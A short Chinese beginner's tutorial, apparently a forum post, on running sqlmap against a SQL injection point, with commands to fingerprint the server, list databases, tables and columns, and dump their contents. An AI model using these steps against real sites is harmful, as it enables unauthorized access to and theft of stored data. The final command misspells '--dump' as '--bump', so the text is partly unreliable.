菜鸟如何使用SQLMAP
SQLMAP是一个自动注入化工具 运行在Python 2.7 环境有具有很强跨平台性、无图形界面
1.
使用快捷方式启动
http://www.secbox.cn/wp-content/uploads/2016/01/81d009539c5eaf1532cba35fd5ed07ae.jpg
2.
现做如下假设
1. 已经安装Python2.7 并已经添加了环境变量
2. 已经下载了SQLMAP
3. 会使用cmd命令行
打开要在sqlmap的目录里
http://www.secbox.cn/wp-content/uploads/2016/01/75b125093c519b3dc142ab12c5ecfe15.jpg
注入点 、绝对不要做坏事 我们是白帽黑阔 这已经提交补天了
1
**************************************
1
sqlmap.py-u"注入点"//会判断数据库类型,服务操作系统、脚本类型 前后有双引号
http://www.secbox.cn/wp-content/uploads/2016/01/132402n6wz6jisa4kjjjoi.jpg
1
03服务器/asp.net/mssql2008
1
sqlmap.py-u"注入点"--dbs//列数据库 按上键
http://www.secbox.cn/wp-content/uploads/2016/01/e3b103a71f7ce0622a43f50176bc5f06.jpg
1
sqlmap.py-u"注入点"-D数据库名--tables//列出表名
http://www.secbox.cn/wp-content/uploads/2016/01/388aa796414481992d791d7bc97ce077.jpg
1
sqlmap.py-u"注入点"-D数据库名-T表名--columns//猜字段
http://www.secbox.cn/wp-content/uploads/2016/01/7767cdbf3ff5d1a24f3dd2dbb568917e.jpg
1
sqlmap.py-u"注入点"-D数据库名-T表名-C"字段名2,字段名2”--bump//获得字符、段内容
http://www.secbox.cn/wp-content/uploads/2016/01/c92c83fd387af3fb1113c8d941c00758.png
页:
[1]